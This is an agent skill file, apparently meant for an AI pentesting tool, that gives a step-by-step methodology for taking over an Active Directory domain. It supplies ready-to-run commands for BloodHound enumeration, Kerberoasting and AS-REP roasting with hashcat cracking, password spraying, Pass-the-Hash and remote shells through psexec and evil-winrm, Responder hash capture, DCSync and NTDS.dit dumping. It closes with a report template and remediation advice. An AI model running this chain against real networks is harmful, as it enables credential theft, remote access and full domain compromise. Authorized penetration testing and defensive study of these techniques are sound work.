| name | pentest-active-directory |
| description | Active Directory penetration testing — BloodHound enumeration, Kerberoasting, AS-REP Roasting, lateral movement, DCSync, Pass-the-Hash, domain privilege escalation. Use when target network has Windows domain controllers.
|
| userInvocable | true |
| requiresBinaries | ["bloodhound-python","impacket-GetUserSPNs","impacket-secretsdump","evil-winrm","hashcat"] |
| tags | ["pentest","active-directory","windows","kerberos"] |
| triggers | ["Active Directory","AD","domain controller","Kerberos","Kerberoasting","BloodHound","NTLM","Pass-the-Hash","DCSync","evil-winrm","impacket","domain admin"] |
pentest-active-directory — Domain Takeover Methodology
Overview
Active Directory environments require a structured attack chain.
The goal: move from initial foothold → Domain Admin credentials → full domain compromise.
Prerequisites:
- At minimum one valid domain user credential (even a low-priv account)
- Network access to the Domain Controller (DC) on port 389/636/445/88
Output directory: /root/kali-workspace/ad/<domain>/
DOMAIN="<domain.local>"
DC_IP="<DC_IP>"
USER="<username>"
PASS="<password>"
mkdir -p /root/kali-workspace/ad/$DOMAIN
Phase 1 — Domain Enumeration
BloodHound Data Collection
bloodhound-python \
-d $DOMAIN \
-u $USER \
-p "$PASS" \
-dc $DC_IP \
-c All \
-o /root/kali-workspace/ad/$DOMAIN/
echo "[*] Upload these files to BloodHound GUI: $(ls /root/kali-workspace/ad/$DOMAIN/)"
LDAP Enumeration
impacket-GetADUsers -all $DOMAIN/$USER:$PASS -dc-ip $DC_IP
nmap -p 88,389,445,3389 -sV $DC_IP --script ldap-rootdse,smb-os-discovery
ldapsearch -x -H ldap://$DC_IP -D "$USER@$DOMAIN" -w "$PASS" \
-b "DC=$(echo $DOMAIN | sed 's/\./,DC=/g')" \
"(objectClass=user)" sAMAccountName userPrincipalName memberOf \
| grep -E "sAMAccountName|memberOf" \
| tee /root/kali-workspace/ad/$DOMAIN/ldap-users.txt
SMB Enumeration (if credentials available)
smbclient -L //$DC_IP -U "$DOMAIN/$USER%$PASS"
impacket-smbclient $DOMAIN/$USER:$PASS@$DC_IP
crackmapexec smb $DC_IP -u $USER -p $PASS --shares
crackmapexec smb $DC_IP -u $USER -p $PASS --users
crackmapexec smb $DC_IP -u $USER -p $PASS --groups
Phase 2 — Credential Attacks
Kerberoasting (Requires valid domain user)
impacket-GetUserSPNs \
$DOMAIN/$USER:$PASS \
-dc-ip $DC_IP \
-request \
-outputfile /root/kali-workspace/ad/$DOMAIN/kerb.hashes
hashcat -m 13100 -a 0 \
/root/kali-workspace/ad/$DOMAIN/kerb.hashes \
/usr/share/wordlists/rockyou.txt \
--force \
-o /root/kali-workspace/ad/$DOMAIN/kerb-cracked.txt
echo "[*] Cracked hashes: $(cat /root/kali-workspace/ad/$DOMAIN/kerb-cracked.txt 2>/dev/null)"
AS-REP Roasting (No password required for target accounts)
impacket-GetNPUsers \
$DOMAIN/ \
-usersfile /root/kali-workspace/ad/$DOMAIN/users.txt \
-dc-ip $DC_IP \
-outputfile /root/kali-workspace/ad/$DOMAIN/asrep.hashes \
-no-pass
impacket-GetNPUsers $DOMAIN/$USER:$PASS -dc-ip $DC_IP -request
hashcat -m 18200 -a 0 \
/root/kali-workspace/ad/$DOMAIN/asrep.hashes \
/usr/share/wordlists/rockyou.txt \
--force \
-o /root/kali-workspace/ad/$DOMAIN/asrep-cracked.txt
Password Spraying (Low-and-slow to avoid lockout)
crackmapexec smb $DC_IP -u /root/kali-workspace/ad/$DOMAIN/users.txt \
-p 'Welcome1' --continue-on-success 2>/dev/null \
| grep "[+]" | tee /root/kali-workspace/ad/$DOMAIN/spray-hits.txt
for PASS in 'Spring2024!' 'Winter2025!' 'Welcome1' 'Company1!'; do
crackmapexec smb $DC_IP -u /root/kali-workspace/ad/$DOMAIN/users.txt \
-p "$PASS" --continue-on-success 2>/dev/null | grep "[+]"
echo "[*] Sprayed: $PASS — sleeping 30min to avoid lockout..."
sleep 1800
done
Phase 3 — Lateral Movement
Pass-the-Hash (PTH)
NTLM_HASH="<aad3b435b51404eeaad3b435b51404ee:NTLM_HERE>"
impacket-psexec $DOMAIN/Administrator@$TARGET_IP -hashes $NTLM_HASH
impacket-smbexec $DOMAIN/Administrator@$TARGET_IP -hashes $NTLM_HASH
evil-winrm -i $TARGET_IP -u Administrator -H $NTLM_HASH
Remote Shell Options (with credentials)
evil-winrm -i $TARGET_IP -u $USER -p "$PASS"
impacket-psexec $DOMAIN/$USER:$PASS@$TARGET_IP
impacket-wmiexec $DOMAIN/$USER:$PASS@$TARGET_IP
xfreerdp /v:$TARGET_IP /u:$USER /p:"$PASS" /dynamic-resolution
NTLMv2 Capture via Responder
responder -I eth0 -rdw
hashcat -m 5600 /usr/share/responder/logs/*.txt \
/usr/share/wordlists/rockyou.txt --force \
-o /root/kali-workspace/ad/$DOMAIN/responder-cracked.txt
Phase 4 — Privilege Escalation to Domain Admin
Identify Paths via BloodHound
In BloodHound GUI (after uploading JSON files):
1. "Find Shortest Paths to Domain Admins" (pre-built query)
2. "Principals with DCSync Rights"
3. "Find All Domain Admins"
4. Look for: GenericAll, WriteDACL, WriteOwner, ForceChangePassword, AllExtendedRights
DCSync Attack (Requires DA or Replication privs)
impacket-secretsdump $DOMAIN/$ADMIN:$PASS@$DC_IP \
-just-dc-ntlm \
| tee /root/kali-workspace/ad/$DOMAIN/dcsync-hashes.txt
impacket-secretsdump $DOMAIN/$ADMIN:$PASS@$DC_IP \
-just-dc \
| tee /root/kali-workspace/ad/$DOMAIN/dcsync-full.txt
grep "krbtgt" /root/kali-workspace/ad/$DOMAIN/dcsync-hashes.txt
NTDS.dit Extraction (Offline Hash Cracking)
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL \
| tee /root/kali-workspace/ad/$DOMAIN/ntds-dump.txt
hashcat -m 1000 -a 0 /root/kali-workspace/ad/$DOMAIN/ntds-dump.txt \
/usr/share/wordlists/rockyou.txt --force
Phase 5 — Evidence & Reporting
Standard Proof of Domain Admin
whoami /all
net group "Domain Admins" /domain
nltest /dclist:$DOMAIN
ipconfig /all
hostname
AD Report Template
# Active Directory Compromise Report
## Domain Info
- Domain: <domain>
- Domain Controller: <hostname> (<IP>)
- Forest Level: <2008/2012/2016/2019/2022>
## Attack Path Summary
1. <Initial foothold via X>
2. <Kerberoasting → cracked <svc_account> password>
3. <Lateral movement via PTH to <host>>
4. <DCSync → extracted all hashes>
## Credentials Obtained
| Username | Type | Method |
| ------------- | ------------------------- | --------------------- |
| svc_sql | Kerberoast hash → cracked | GetUserSPNs + hashcat |
| Administrator | NTLM hash | DCSync |
## BloodHound Findings
- Shortest path to DA: <X hops via <account>>
- Kerberoastable service accounts: <count>
- AS-REP roastable accounts: <count>
- Accounts with DCSync rights: <list>
## Recommendations
- Disable RC4 encryption for Kerberos (enforce AES only)
- Audit SPN service accounts — enforce strong passwords
- Enable Protected Users security group for admin accounts
- Implement tiered admin model (Tier 0/1/2)
- Monitor 4769/4768 Kerberos events in SIEM
Quick Reference — Key Ports for AD
| Port | Service | Used For |
|---|
| 88 | Kerberos | Authentication, ticket requests |
| 135 | RPC | DCOM, WMI |
| 139/445 | SMB | File shares, lateral movement |
| 389/636 | LDAP/LDAPS | Directory queries |
| 464 | Kpasswd | Password change |
| 3268/3269 | Global Catalog | Cross-domain queries |
| 5985/5986 | WinRM | Remote management (evil-winrm) |
| 3389 | RDP | Remote desktop |